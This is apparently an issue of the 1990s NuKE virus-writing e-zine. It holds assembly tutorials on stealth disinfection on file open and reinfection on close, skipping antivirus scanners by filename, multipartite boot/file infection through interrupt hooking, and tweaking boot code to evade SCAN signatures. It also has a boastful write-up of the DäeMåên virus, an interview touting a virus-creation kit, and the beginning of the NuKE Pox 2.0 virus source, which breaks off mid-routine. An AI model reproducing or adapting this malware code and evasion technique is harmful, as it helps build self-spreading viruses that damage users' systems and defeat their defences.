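In the CFB case the damage is confined to the flipped byte and the following eight, after which the receiver's register again holds only correct cipher bits.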
Of course, one can always reduce the time required to exhaust any
cryptoalgorithm by having several devices working in parallel; time is
reduced but initial expenses are increased.

                                                        Rock Steady/NuKE
===========================================================================
===========================================================================

                  *************************************
                  **  Disinfecting an Infected File  **
                  **                                 **
                  **       By Rock Steady/NuKE       **
                  *************************************

The BEST advantage a virus can have is `Disinfecting on the Fly' as we
must try to basically hide the virus as well as possible! And nowadays
Anti-Virus programs are going crazy. As I remember, at the time Npox 2.0
was developed it would disinfect every file opened by F-prot and Scan, and
when the scanner found nothing and closed the file to go on to the next,
Npox would re-infect them. Truly can cause havoc. As a matter of fact
Frisk didn't like this as I had some `Anti Fuck-Prot' routines and he
added his own routine to open files by Int21h/6C00h, as Npox only
disinfected on Int21h/3Dh. However, to make the virus disinfect on
Int21h/6C00h doesn't require much work: simply take the ASCIIZ string at
DS:SI and put SI into DX so we have DS:DX pointing to it, then run this
routine.

The basic idea on disinfection is this...

-For .COM files
   Restore the first 3 original bytes of the program; these 3 bytes are
   usually somewhere inside the virus, and then simply remove the virus
   from the end of the .COM file! We do this by jumping to the end of the
   COM file and subtracting the virus size from the file size, and that
   new value is the original file size!
   NOTE: if you write a virus whose length changes (Polymorphic) it's wise
         to save the original filesize of the file to be infected
         beforehand.
-For .EXE files & Overlays This procedure is not different, just that if you changed CS:IP & SP:SS in the EXE header, simply restore the original values, or to save time, simple save the Original EXE header (first 1b bytes) in the virus and right that to the beginning as I did for Npox 2.0 Then Subtract yourself from the original size and cut it off! I will now follow thru the Npox 2.0 virus routine Closely so you can under stand this process. Okay first thing you would want to do is CHECK if this is a valid file! If the virus infects COMs & EXEs, do not waste your time looking thru other extensions, or for tight code you can waste your time and "HOPE" the `infection' marker will fail! Meaning if the virus uses the seconds field set to 60 (as Npox) then naturally only INFECTED files will have a time stamp of 60! And this routine is not needed... opening_file: call check_extension ;Check for .COM extension jnc open_fuck2 ;YES; Jmp & Disinfect call check_exten_exe ;Check for .EXE extension jnc open_fuck2 ;YES; Jmp & disinfect jmp dword ptr cs:[int21] ;Other wise goto DOS ; At this point the file has an .COM or .EXE extension, so we continue open_fuck2: push ax ;Save AX mov ax,3d02h ;Ready to open call calldos21 ;Do it! ;NOTE: its important you called Int21h YOURSELF! you CAN NOT do a "Int 21h" ;command, as the virus will intercept it, and will come to this routine ;and it will continue over and over again, Never ending loop, until the ;stack gets too big, overwrite the code and the system jams...All done ;in about 2 seconds... jnc open_fuck1 ;No Error Continue pop ax ;restore iret ;Exit open_fuck1: push bx push cx push dx push ds mov bx,ax ;BX=File handler mov ax,5700h ;Get file TimeStamp call calldos21 mov al,cl ;move seconds into al or cl,1fh ;Left just seconds dec cx ;60 Seconds xor al,cl ;cmp jnz opening_exit3 ;NOT 60 seconds exit! 
dec cx mov word ptr cs:[old_time],cx ;Save time Stamp mov word ptr cs:[old_date],dx ;Save Date Stamp mov ax,4202h ;Goto the End of File xor cx,cx xor dx,dx call calldos21 mov cx,dx ;Save the filesize mov dx,ax ;we will need it later ;to subtract the virus push cx ;size fromit... push dx ;Save it... Here now we get the first 3 bytes (for com) or first 1B bytes (EXE header) in the Nuke Pox virus I save the ORIGINAL first 3 bytes of the .com at the VERY END! Since the buffer I made was 1B hex bytes, it is able to hold the EXE header or 3 .com bytes, anyhow the beginning of these bytes are the last 1B bytes, since its at the end... figure it out where you saved your 3 bytes or exe header for your virus, or use the Npox routine... sub dx,1Bh ;Subtract 1B bytes from sbb cx,0 ;the filesize! mov ax,4200h ;Now our pointer will call calldos21 ;point to the 1B bytes ;Where the COM & EXE ;original bytes are push cs pop ds ;CS=DS (for exes) mov ah,3fh ;Read them into Buffer mov cx,1Bh ;1B bytes mov dx,offset buffer ;to our buffer call calldos21 humm, now we got the original bytes, all we gotta do is write them back to the file's beginning... xor cx,cx ;Goto Beginning of File xor dx,dx ; mov ax,4200h call calldos21 mov ah,40h ;Write first three bytes mov dx,offset buffer ;our buffer mov cx,1Bh ;1B bytes for EXEs cmp word ptr cs:[buffer],5A4Dh je open_exe_jmp ;if EXE file jump mov cx,3h ;if COM write only 3 bytes open_exe_jmp: call calldos21 We wrote the original file's data back to place, now we need to cut the virus off from the file, the virus is written at the end of the file, so all we do is set our file-pointer to EOF - Virus_Size, which gives us the original file length! 
pop dx ;EOF - Virus_Size pop cx ;to get ORIGINAL File size sub dx,virus_size ;subtract virus size sbb cx,0 mov ax,4200h call calldos21 Now this is perhaps the "TRICKIEST" part, in order to "CROP" the file, at our new ptr location, what we do it use does to crop it, by writing 0 bytes to the new location, DOS will make that new location the NEW EoF and in result cutting off the virus and deleting its sector in the fat. mov ah,40h ;Write new EOF xor cx,cx ;Zero Bytes call calldos21 ;doit mov cx,word ptr cs:[old_time] ;Restore file time mov dx,word ptr cs:[old_date] ;Restore file date mov ax,5701h int 21h mov ah,3eh ;Close File call calldos21 opening_exit3: pop ds pop dx pop cx pop bx pop ax jmp dword ptr cs:[int21] ;Return to DOS... ahh, the file is now Disinfected, now we safely return it to DOS and DOS may now open the file for inspection... Rock Steady/NuKE =========================================================================== =========================================================================== **************************** ** Infection on Closing ** ** ** ** By Rock Steady/NuKE ** **************************** This routine goes out for a few people that had trouble hacking this routine themselves... I kinda like it, its my very OWN, no Dark Avenger hack, it is VERY straight forward, and kinda simple...I was not going to put this here, but since I `Promised' people and left them hanging with `Wait for IJ#5, I guess I owed you it... huh?' Again this code comes right out of Npox 2.0, its need, simple fast, cool, and it works, Npox is your example, I heard MANY MANY complaints with other `Virus writing guides' Meaning they explained the code but sometimes the arthur himself never check if the code was good, as he may have modified it, and not test it... or whatever reason... Anyhow ------------------ Okay once you intercepted the Int21h/ah=3Dh function you make it jump here... closing_file: cmp bx,0h ;Handle=0? 
je closing_bye ;if equal leave cmp bx,4h ;Handle > 4 ja close_cont ;if YES ,then JUMP! closing_bye: jmp dword ptr cs:[int21] ;Leave, no interest to us The whole point of the above code is that DOS contains 5 predefined Handlers, 0 -> 4, Basically, those handles are the NULL, CON, AUX COMx, LPTx handles... So we surely do not need to continue once we encounter that... close_cont: push ax push bx push cx push dx push di push ds push es push bp Our biggest problem is how do we know if this file is a .COM or .EXE or simply just another dumb data file? We need this info before we can try to infect it... We do this by getting DOS's "Lists of List" this will give us all INFO need on the File Handle Number we have in BX! and we do that like so... push bx ;Save File Handle mov ax,1220h ;Get the Job File Table int 2fh ;(JFT) This will give us the JFT for the CURRENT File handle in BX, which is given thru ES:DI Then we use this information to get the Address of the System File Table! mov ax,1216h ;Get System File Table (List) mov bl,es:[di] ;system file table entry number int 2fh pop bx ;restore the Handle add di,0011h mov byte ptr es:[di-0fh],02h add di,0017h ;Jump to the ASCIIZ string cmp word ptr es:[di],'OC' ;Is it a .COM file? jne closing_next_try ;Next cmp... cmp byte ptr es:[di+2h],'M' jne pre_exit ;Nope exit jmp closing_cunt3 ;.COM file continue closing_next_try: cmp word ptr es:[di],'XE' ;Is it a .EXE file? jne pre_exit ;No, exit cmp byte ptr es:[di+2h],'E' jne pre_exit ;No, exit If it is an .EXE file, check if it is F-PROT or SCAN, see F-PROT when started up, Opens itself, closes itself, etc... So that a dumb virus will infect it, and then the CRC value changes and F-PROT screams... haha... Fuck-Prot! is the name... 
closing_cunt: cmp word ptr es:[di-8],'CS' jnz closing_cunt1 ;SCAN cmp word ptr es:[di-6],'NA' jz pre_exit closing_cunt1: cmp word ptr es:[di-8],'-F' jnz closing_cunt2 ;F-PROT cmp word ptr es:[di-6],'RP' jz pre_exit closing_cunt2: cmp word ptr es:[di-8],'LC' jnz closing_cunt3 cmp word ptr es:[di-6],'AE' ;CLEAN jnz closing_cunt3 pre_exit: jmp closing_nogood The REST is pretty much the EXACT same on `how' you'd infect a normal file, I'll leave it for you to go thru it... The hardest part is OVER! Only trick part is, the ending... Remember to Close the file and then do an IRET, you don't leave control to dos, as you only needed to close it, so do it... OR DON'T close it and return to DOS, as dos will close it, just DON'T CLOSE IT TWICE!!!! closing_cunt3: mov ax,5700h ;Get file Time call calldos21 mov al,cl or cl,1fh dec cx ;60 Seconds xor al,cl jz closing_nogood ;Already infected push cs pop ds mov word ptr ds:[old_time],cx ;Save time mov word ptr ds:[old_date],dx mov ax,4200h ;jmp beginning of xor cx,cx ;file... xor dx,dx call calldos21 mov ah,3fh ;Get first 1b byte mov cx,1Bh mov dx,offset buffer call calldos21 jc closing_no_good ;error? mov ax,4202h ;Jmp to the EOF xor cx,cx xor dx,dx call calldos21 jc closing_no_good cmp word ptr ds:[buffer],5A4Dh ;.EXE file? je closing_exe ;Yupe then jmp mov cx,ax sub cx,3h mov word ptr ds:[jump_address+1],cx ;Figure out the call infect_me ;jmp for .com jc closing_no_good mov ah,40h ;Write it to file mov dx,offset jump_address mov cx,3h call calldos21 closing_no_good: mov cx,word ptr ds:[old_time] ;Save file time mov dx,word ptr ds:[old_date] ;& date mov ax,5701h call calldos21 closing_nogood: pop bp pop es pop ds pop di pop dx pop cx pop bx pop ax jmp dword ptr cs:[int21] AS you see the above, we DIDN'T close the file, so we leave dos to do it. The bottom is for infecting .exes... 
closing_exe: mov cx,word ptr cs:[buffer+20] ;Save the original mov word ptr cs:[exe_ip],cx ;CS:IP & SS:SP mov cx,word ptr cs:[buffer+22] mov word ptr cs:[exe_cs],cx mov cx,word ptr cs:[buffer+16] mov word ptr cs:[exe_sp],cx mov cx,word ptr cs:[buffer+14] mov word ptr cs:[exe_ss],cx push ax push dx call multiply sub dx,word ptr cs:[buffer+8] mov word ptr cs:[vir_cs],dx push ax push dx call infect_me pop dx pop ax mov word ptr cs:[buffer+22],dx mov word ptr cs:[buffer+20],ax pop dx pop ax jc closing_no_good add ax,virus_size adc dx,0 push ax push dx call multiply sub dx,word ptr cs:[buffer+8] add ax,40h mov word ptr cs:[buffer+14],dx mov word ptr cs:[buffer+16],ax pop dx pop ax push bx push cx mov cl,7 shl dx,cl mov bx,ax mov cl,9 shr bx,cl add dx,bx and ax,1FFh jz close_split inc dx close_split: pop cx pop bx mov word ptr cs:[buffer+2],ax mov word ptr cs:[buffer+4],dx mov ah,40h mov dx,offset ds:[buffer] mov cx,20h call calldos21 closing_over: jmp closing_no_good ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- ; Infection Routine... ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- infect_me proc mov ah,40h mov dx,offset init_virus mov cx,virus_size call calldos21 jc exit_error ;Error Split mov ax,4200h xor cx,cx ;Pointer back to xor dx,dx ;Top of file! call calldos21 jc exit_error ;Split Dude... clc ;Clear carry flag ret exit_error: stc ;Set carry flag ret infect_me endp =========================================================================== =========================================================================== Multipartite Infection ~~~~~~~~~~~~~~~~~~~~~~ OK, you've seen them floating around... these whiz-bang you-bewt mongrel viruses which never seem to go away, even after you disinfect every file in existence... Huh... How the fuck did that come back?! Well it's really quite simple, and I'm sure not all of you out there are complete idiots. The fact is that the virus isn't even in any files! 
...It's hiding in the partition table, or the boot sector! There are only a few viruses out there with the capability for multipartite infection, or "boot/file virus". Tequila, Anthrax and Invader are a few examples. My own creation, DäeMåên, is another, going a step further than any other boot/file virus has ever gone before, by infecting almost everything possible.

The principle is VERY simple, in fact I kicked myself when I worked out a way to do it. The idea is simple, and it's the very same principle employed in any other TSR method... to hook interrupt 21h (DOS). This is fine. BUT the only hitch is that DOS automatically overwrites the old vector when it loads! So there's no point hooking it as soon as your code loads up off the disk. So what can we do? We will obviously have to wait for DOS to change the interrupt, so we can hook it. But there's one problem! Other stupid programmers were being selfish and change the i21 pointer as a marker so that they can tell if it's been changed... like Invader puts in a -1 in the IP value of int 21h... so if something like DaeMaen is also on the system, it thinks it's DOS changing the pointer, hooks it and crashes the entire system...

The way I waited for the pointer to change was to hook interrupt 13 TWICE! (huh?) Pretty simple. What I did was have my int-check routine hooked onto i13 first, then my i13 handler over the top. The reason why you can't have it the other way is that in case another "program" hooks i13 over the top, and you can't disable your int-check routine... so it'll keep re-hooking and fuck up the system. (You could do it with flags, but I try and use as few flags as possible to keep code size down to a minimum).
At boot-up, the program checks to see if it's already TSR (via an illegal call to some interrupt, and checking the return code) and if it isn't, it steals some memory (something F-Prot and friends can pick up, but who gives a fuck, plus I can get around that now...), hooks int 13h with the int-check routine, hooks it again with our i13 handler, then save the current interrupt 21h vector. On every disk call, it compares the value of i21 with the saved value... if it's different, the int-check routine hooks it and then change the vector that our int 13h handler calls, so it no longer calls our int-check routine but goes straight to the real i13. That's the essentials of boot/file management. Anyhow, here's the code to do what I just said, as it appears in the source code of DäeMåên... new13_2: ; the guts of multipartite infection ; check to see if i21 has changed... if so, hook it call save ; save registers push cs pop es xor ax, ax mov ds, ax mov si, 21h*4 mov di, offset oldvect+8 cld cmpsw je nochange cmpsw je nochange call capture_21 push cs pop ds mov si, offset oldvect+0 ; copy over other ptr so lea di, [si+4] ; that our i13 doesn't call movsw ; here any more [i21 has movsw ; been hooked] nochange: call restore ; restore registers jmp dword ptr cs:[oldvect+0] This method can be used on either floppy boot sector infection or the HD partition table infection. As with many of my routines, stuff which took many other virus writers a few pages of code took me one page... that's not bad! I have many other goodies up my sleeve, like a 387-byte generic COM/EXE parasitic infector on execution, the smallest of its kind in the WORLD... (with room for improvement!). Anyway, next InfoJournal will include the source codes to two of my prerelease Mutation Engines, both of which are fully functional in their own right. They have evolved far beyond my dreams, and I hope to have the world's best mutation engine finished by the end of February/March. 
(but it can't be the best at everything, but it sure generates a bucket fuckload of arcane bullshit instructions. Heuristical nightmare...) Anyway, have fun screwing around with this little piece of research material... TäLöN/NuKE =========================================================================== =========================================================================== DäeMåên Virus ~~~~~~~~~~~~~ This virus took me a while to write (about two weeks), because I was writing a lot of it for the first time. Some of the code is a bit overboard, like I don't think the SYS entry has to be quite that complex in order to work... but never mind. At least it works and it's quite well-behaved. This virus is my first boot/file virus, and that also works perfectly. I worked all my own routines from scratch (my virus collection is extremely small, and I don't want to be influenced by other implementations unless they're better). It infects both floppy boot sectors, moving the original boot sector to the 5th last sector of the disk and writing the virus code on the last four. It also infects the Master Boot Record (partition table) on the first physical hard disk. Booting off an infected floppy will infect the MBR, as will the execution of an infected file. However, trying to read the partition table results in the redirection of the call, resulting in the original partition table (prior to infection) being read/written. Floppies are infected on read/write access, and won't be infected if the drive is still spinning (ie. no disk change). It will take the boot sector and use the BPB to calculate the last sectors of the disk, no matter what format, be it 160k, 1.44meg, or even a 20meg floptical disk. It makes sure it's a valid BPB by checking the OEM name to see if it's valid alphanumeric characters, but I was a bit selfish in that I overwrite the last word of OEM to mark infection. 
Files ending with the extensions .COM, .EXE, .BIN, .OVL and .SYS will be infected on every possible file handle access I could find, ie. they will be infected on Open (3D), Close (3E), Attrib Change (43), Execution (4B), Handle Rename/Move (56), and Extended Open (6C). It manages to infect on file close by recording the filename by intercepting Create (3C) call, and the handle if it was created successfully. If resident off infected file, it will not hook int 13h directly, instead searching segment 70h for DOS's call to the original interrupt handler, then putting our address in there instead and using the old address for our calls. It would have been possible to search the ROM BIOS for the correct handler, but that would circumvent future generations of boot/file viruses. DäeMåên employs a small decryption algorythm, however it is not variable mutation, since a few registers have to be saved in order for the SYS infection to work. The code is thoroughly encrypted, and McAfee and friends will have to write a new disinfection engine for this baby. However, disk infections are not encrypted, although it would have been easily done. The routine to load the virus off the disk has been altered to avoid detection as Generic Boot Sector/Generic Partition virus. The changes are trivial, and it makes it look as if I don't know what I'm doing. The fact that I'm avoiding detection isn't readily apparent. Here is a code comparison, take a look for yourself. Generic DäeMåên mov si, 413h mov si, 412h sub word ptr [si], 3 add word ptr [si+1], -3 ; take 3k int 12h lodsb lodsw mov cl, 6 mov cl, 6 shl ax, cl shl ax, cl mov es, ax mov es, ax xor bx, bx xor bx, bx The one on the left will be detected by SCAN, the one on the right will not. The differences are trivial. SCAN is such a stupid program, it's just ridiculous that millions of PC users rely on it utterly for total virus protection. That's great... DäeMåên is partially selective in which files it infects. 
Firstly, it will scan the filename for the characters SC, VS, CL and F-, which excludes a lot of scanners (eg SCAN, TBSCAN etc), VSHIELD, CLEAN and F-PROT. Nor will it infect programs which have internal overlays. This is a great advantage since people running WinDoze won't have their favourite XYZ program fuck up because a virus infected it. DäeMåên simply will not infect programs with internal overlays. Here is the code to detect them: chkovl: call file_end push ax ; check for internal overlays push dx mov ax, word ptr [page_cnt] mov cx, 512 mul cx pop cx pop bp cmp ax, bp jb done cmp dx, cx jb done [...] done: ret Pretty simple routine, huh? The beauty of this beast is that one small mistake, like trying to boot an infected disk by accident, or perhaps running an infected file, is that next time you boot up your system, EVERY file in your CONFIG.SYS, AUTOEXEC.BAT and everything henceforth will become infected! It is very easy to expose a large number of files to the virus in a very short space of time. Again, SCAN will probably help the spread of this virus immensely, by stupid users scanning their HD habitually, with the virus in memory... of course, EVERY file will then be infected. As if that weren't enough for one virus, DäeMåên will also hide the increase of file size on the DOS directory. However, like most other viruses which employ this stealth method, CHKDSK will not report any allocation errors on these files. File size increase will be only 2048 bytes, or 4096 bytes for SYS files. It will account for the different increase of the SYS. To hide the increase, DäeMåên employs a little-exploited method, which is by adding 100 years to the date of the file. This way, other over-exploited methods (like setting the seconds field to a certain value) will not interfere with DäeMåên's stealth operation, and vice-versa. DäeMåên also includes a number of text strings: "[DäeMåên] by TäLöN-{NûKΣ}" 25 bytes "Hugs to Sara Gordon" 19 bytes "Hey John! 
If this is bad, wait for [VCL20]!" 43 bytes
"For Dudley" 11 bytes
"[VCL20ß]/TäLöN" 15 bytes
total 113 bytes

(That stuff about VCL20ß is ßogus, just to make McAsshole shit his pants. But AV researchers be warned: a fair few of the routines contained in DäeMåên will also appear in VCL 2.0, like the boot/file infect capability!)

Virus Length = 2048
Message Length = 113
...Code Length = 1935 bytes!!!

Totally unheard of! I seriously doubt anybody can beat that, at least not for a while yet. For a quick rehash of what this virus does... COM/EXE/BIN/OVL/SYS/MBR/BS Parasitic Self-Encrypting Stealth virus, a mere 2048 bytes long... but I can say Patricia Hoffman will totally fuck up her description of this virus, she is so pathetically brain-dead.

Anyway, look out for a FULL STEALTH, WILDLY POLYMORPHIC COM/EXE/MBR INFECTOR coming soon to a computer installation near you! From TäLöN of course! And another one minus the polymorphism, under 800 bytes! Have fun! And good night, John!

TäLöN/NuKE
===========================================================================
===========================================================================
Sunday Telegraph Interview
~~~~~~~~~~~~~~~~~~~~~~~~~~

Well, about a month ago a NuKE associate received a call from a female reporter named Barbara Lewis; it was not our first, and surely not our last. Nevertheless, the topic she raised was quite interesting! We have the complete conversation with our NuKE member and Barbara Lewis. For those that need more info, Barbara Lewis is an English reporter for the _Sunday Telegraph_ in the United Kingdom. The article should also be published in the _New York Times_, and I guess we will pin it up with the others now. Anyhow the conversation...

Barbara> Beep-Bop-Beep-Dot-Beep-Beep-Bop. [Dials the number...]

Nuke > Hello?

Barbara> Yes, I'm looking for "Joseph Greco," as I am a reporter, Barbara Lewis, for the _Sunday Telegraph_ in London. Is he there?

Nuke > This is he, how can I help you.
[The old charms.]

Barbara> I am writing an article on virus groups and related underground activities, I received this number from a friend telling me I could get some information from you.

Nuke > What do you wish to know, and I will see if I can help you.

Barbara> I wish to know about the virus writers, why do they write such programs? What do they find from these malicious programs?

Nuke > I believe you have the concept all messed up. Speaking on the behalf of NuKE members we find that producing perhaps the most technological advanced virus to exist, will if chance help the AV (anti-virus) community to develop a standard or perhaps a minimum of what their packages should do, as if it is capable of the most advanced virus then getting the others is no problem. Also, we see today that the anti-virus community are trying to pull a suppression over all the computer users, and terrorize them with this bad thing called a virus. Of course this method is simply for the fact of increasing sales of their AV product, which in turn is described to perform miracles when it comes to virus protection. We have all heard about the well known SCAN by McAfee, we have succeeded in removing all their virus strings and have found that there was only 850 of them, and doesn't SCAN boast 1700+ viruses? Perhaps he has a copy of every virus twice? Who knows!

Barbara> So you say that you are helping out the AV community?

Nuke > Well, not really, our basic idea is to help YOU, the average computer user that is dumb on computer structures and uses these software packages to only later find out he was raped, raped out of his data and his money. I'll give you an example. F-Prot is heard to be a great anti-viral kit, and that it can stop many viruses at its tracks, unknown and known. Inside the F-Prot kit there is a program called VIRSTOP, it is a TSR program that will check every file you run for infection etc... Now who would expect that VIRSTOP only detects 800 viruses, NOT MORE! And the strings are cheap works that would lose all credit for Frisk and his package if "word got out!" Lemme tell you, the well-known encryption engines like MtE are NOT detected by VIRSTOP! It is not a miss in code, Frisk NEVER put the damn routine inside, it is incapable to detect any polymorphic virus that has infected the system! You have just succeeded into screwing yourself just as McAfee did with SCAN! See, we are here to show you the facts, many people are not able to disassemble and look through the code and find out what the virus package can detect! So we bring this information out to the public, all I say is TRUE and can be backed up with the proof I found inside these AV programs!

Barbara> What about the virus writers wanting to cause damage?

Nuke > Again that is why we are here, if you produce you a virus that is unbelievable, the advances in the scanners will increase by learning from our viruses, and the chances of a 14-year-old wanting to create a virus for revenge or whatever reason cannot compete with this and their virus become a failure, which is exactly what we want! And we too do not enjoy those "kids" that enjoy damage, we run this organization legally and seriously. If we do find such a user within our circle surely he will be made an example of.

Barbara> There has been a group of teenagers in England that were virus writers and called themselves ARCV, they have been arrested as of Feb 8th, 1993 and are going on trial for creating viruses. What do you think of this?

Nuke > Yes, ARCV, I knew them well. In this case I CANNOT say that I am happy to see them arrested, you see many of their viruses have been found and related to VCL/MPC generators. See, VCL is a friendly user kit standing for Virus Creation Laboratory, all one has to do is flag on the option he/she would want with his dandy mouse and once done hit compile and the kit will produce you the virus you asked it to do. Now are we going to put someone on trial for simply using such a program? Are we going to introduce laws that make it illegal to run certain programs in YOUR OWN computer? I find that a laugh! They certainly can not be responsible!

Barbara> Then whom are we going to make responsible for these acts?

Nuke > Tough question, well I certainly do not believe that ARCV is. I know several whom have used the VCL kit to generate viruses to test how effective their anti-virus program was. This person created the virus, in order to test them, should he be arrested and tried? How do we know if a "bullet-proof" vest can withstand a bullet? Naturally we test it! Also I find you are losing touch with the real issue! A virus is nothing but a program, it can not be created by itself, it will do exactly what the creator wanted it to do! Nothing more or less. ARCV's virus never contain any DAMAGING CODE, they were viruses with little messages and all... Wouldn't you say the guilty person is the one that intentionally or carelessly created the virus for the produce to cause havoc? The maker of a gun is not responsible for all the murders but those that use it for that intention are.

Barbara> You seem to know a lot on what is happening on this topic, may I ask to what organization you belong to?

Nuke > Sure, we called ourselves "NuKE" we are an international group, ranging from Canada, USA, Australia, Europe. We are highly organized, much more than what anybody would expect! We monitor the virus and AV scene, not many would know it, but we do. We are the makers of VCL which was the first of its kind, and STILL IS, the ONLY virus kit to fully create your unique virus, many like MPC consist on one virus which is broken up, we provide options as adding your own feature or choose any 24 we have.
We will be releasing a VCL v2.0 to be again the FIRST of its kind surpassing anything out there, it may "boggle" the world, but it will set new standards and pave new methods of virus scanning, it will unfortunately kill the little guys, but in this world you have to be very competitive. The VCL kit will perhaps be marketed, if you wish you may even buy an advance copy when it comes out within a month!

Barbara> Sounds interesting, what is the price range?

Nuke > Humm...I guess 75$-100$ (US)

Barbara> I'll leave you my number, +44-XX-XXX-XXXX. Call me when this program is available.

Nuke > K0ol...Will do... [Wow a date already?]

Barbara> I thank you for your time, and good day. [Mush]

Nuke > Okay now taw-taw... [English humour]

The NuKE Associates
===========================================================================
;==========================================================================
; ** NuKE Pox v2.0 **
;This is VERY old code but I promised to give it out, you'll see it exactly
;like Npox v1.1 in IJ#4, The code here is VERY BADLY written, I wrote WHOLE
;procedures TWICE! so LOTS of double code, I leave it UNTOUCHED for you to
;see, and understand it! I don't care if you fuck with it, go for it!
;The method of TSR is old, method of getting the Vectors is bad, the way
;I infect EXEs ain't too hot... But hell it works! It infects overlays..
;it won't infect F-prot.exe or anything with ????SCAN.EXE like SCAN.EXE or
;TBSCAN.EXE etc... Command.com dies fast... Really neat...Play all you like
;
;And to all those that said I `Hacked' this...
; FFFFFF UU UU CCCC KK KK YY YY OOOO UU UU
; FF UU UU CC CC KK KK YY YY OO OO UU UU
; FFFF UU UU CC KKK === YY OO OO UU UU
; FF UU UU CC CC KK KK YY OO OO UU UU
; FF UUUUUU CCCC KK KK YY OOOO UUUUUU
;Just cuz you can't do it, doesn't mean I can't, anyhow my 93 viruses are
;500% better than this one...
;*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- ;-* (c) Rock Steady, Viral Developments -* ;*- (c) NuKE Software Developement 1991, 1992 *- ;-* -* ;*- Virus: NuKE PoX Version: 2.0 *- ;-* ~~~~~~ ~~~~~~~~ -* ;*- Notes: EXE & COM & OVL Infector, TSR Virus. Dir Stealth Routine. *- ;-* Will Disinfect files that are opened, and re-infect them -* ;*- when they are closed! Executed files are disinfected then *- ;-* executed, and when terminated reinfected! -* ;*- VERY HARD to stop, it goes for your COMMAND.COM! beware! *- ;-* It is listed as a COMMON Virus due to is stealthiness! -* ;*- Bytes: 1800 Bytes *- ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* virus_size equ last - init_virus ;Virus size mut1 equ 3 mut2 equ 1 mut3 equ 103h ;Offset location seg_a segment byte public assume cs:seg_a, ds:seg_a org 100h ;COM file! rocko proc far start: jmp init_virus ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- ; Virus Begins Here... ;------------------------------------------------------------------------- init_virus: call doit_now ;Doit VirusMan... doit_now: pop bp ;Not to Lose Track sub bp,106h ;Set our position push ax ;Save all the regesters push bx push cx push dx push si push di push bp push es push ds mov ax,0abcdh ;Are we resident Already? int 21h ;***McAfee Scan String! cmp bx,0abcdh ;Yupe... Quit Then... je exit_com push cs ;Get CS=DS pop ds mov cx,es mov ax,3521h ;Sometimes tend to inter- int 21h ;cept this Interrupt... 
mov word ptr cs:[int21+2][bp],es ;Save the Int mov word ptr cs:[int21][bp],bx ;Vector Table dec cx ;Get a new Memory block mov es,cx ;Put it Back to ES mov bx,es:mut1 ;Get TOM size mov dx,virus_size ;Virus size in DX mov cl,4 ;Shift 4 bits shr dx,cl ;Fast way to divide by 16 add dx,4 ;add 1 more para segment mov cx,es ;current MCB segment sub bx,dx ;sub virus_size from TOM inc cx ;put back right location mov es,cx mov ah,4ah ;Set_block int 21h jc exit_com mov ah,48h ;now allocate it dec dx ;number of para mov bx,dx ; int 21h jc exit_com dec ax ;get MCB mov es,ax mov cx,8h ;Made DOS the owner of MCB mov es:mut2,cx ;put it... sub ax,0fh ;get TOM mov di,mut3 ;beginnig of our loc in mem mov es,ax ; mov si,bp ;delta pointer add si,offset init_virus ;where to start mov cx,virus_size cld repne movsb ;move us mov ax,2521h ;Restore Int21 with ours mov dx,offset int21_handler ;Where it starts push es pop ds int 21h exit_com: push cs pop ds cmp word ptr cs:[buffer][bp],5A4Dh je exit_exe_file mov bx,offset buffer ;Its a COM file restore add bx,bp ;First three Bytes... 
mov ax,[bx] ;Mov the Byte to AX mov word ptr ds:[100h],ax ;First two bytes Restored add bx,2 ;Get the next Byte mov al,[bx] ;Move the Byte to AL mov byte ptr ds:[102h],al ;Restore the Last of 3b pop ds pop es pop bp ;Restore Regesters pop di pop si pop dx pop cx pop bx pop ax mov ax,100h ;Jump Back to Beginning push ax ;Restores our IP (a CALL retn ;Saves them, now we changed command db "C:\COMMAND.COM",0 exit_exe_file: mov bx,word ptr cs:[vir_cs][bp] ;fix segment loc mov dx,cs ; sub dx,bx mov ax,dx add ax,word ptr cs:[exe_cs][bp] ;add it to our segs add dx,word ptr cs:[exe_ss][bp] mov bx,word ptr cs:[exe_ip][bp] mov word ptr cs:[fuck_yeah][bp],bx mov word ptr cs:[fuck_yeah+2][bp],ax mov ax,word ptr cs:[exe_ip][bp] mov word ptr cs:[Rock_fix1][bp],dx mov word ptr cs:[Rock_fix2][bp],ax pop ds pop es pop bp pop di pop si pop dx pop cx pop bx pop ax db 0B8h ;nothing but MOV AX,XXXX Rock_Fix1: dw 0 cli mov ss,ax db 0BCh ;nothing but MOV SP,XXXX Rock_Fix2: dw 0 sti db 0EAh ;nothing but JMP XXXX:XXXX Fuck_yeah: dd 0 int21 dd ? ;Our Old Int21 ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- ; Dir Handler ;------------------------------------------------------------------------- old_dir: call calldos21 ;get FCB test al,al ;error? jnz old_out ;nope push ax push bx push es mov ah,51h ;get PSP int 21h mov es,bx ; cmp bx,es:[16h] ; jnz not_infected mov bx,dx mov al,[bx] push ax mov ah,2fh int 21h pop ax inc al ;Extended FCB? 
